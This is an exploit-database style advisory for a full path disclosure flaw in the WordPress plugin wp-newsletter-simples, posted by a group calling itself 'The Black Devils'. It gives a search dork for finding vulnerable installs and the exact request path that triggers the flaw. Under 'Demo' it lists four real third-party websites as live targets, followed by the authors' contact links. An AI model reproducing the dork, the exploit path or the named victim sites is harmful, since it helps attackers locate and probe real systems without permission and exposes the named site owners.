# Exploit Title: Wordpress wp-newsletter-simples plugin Full Path Disclosure vulnerability
# Date: 08/01/2012
# Author: The Black Devils
# Category : [ webapps ]
# Type : php
# Tested on: [Windows] & [Ubuntu]
# Dork : inurl:"/plugins/wp-newsletter-simples"
#------------------
http://localhost/wp-content/plugins/wp-newsletter-simples/tl-newslleter.php
Demo
http://www.futuratecnologia.inf.br/wp-content/plugins/wp-newsletter-simples/tl-newslleter.php
http://www.segurancaimoveisgo.com.br/wp-content/plugins/wp-newsletter-simples/tl-newslleter.php
http://www.inovelink.com.br/wp-content/plugins/wp-newsletter-simples/tl-newslleter.php
http://faeb.com.br/wp-content/plugins/wp-newsletter-simples/tl-newslleter.php
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information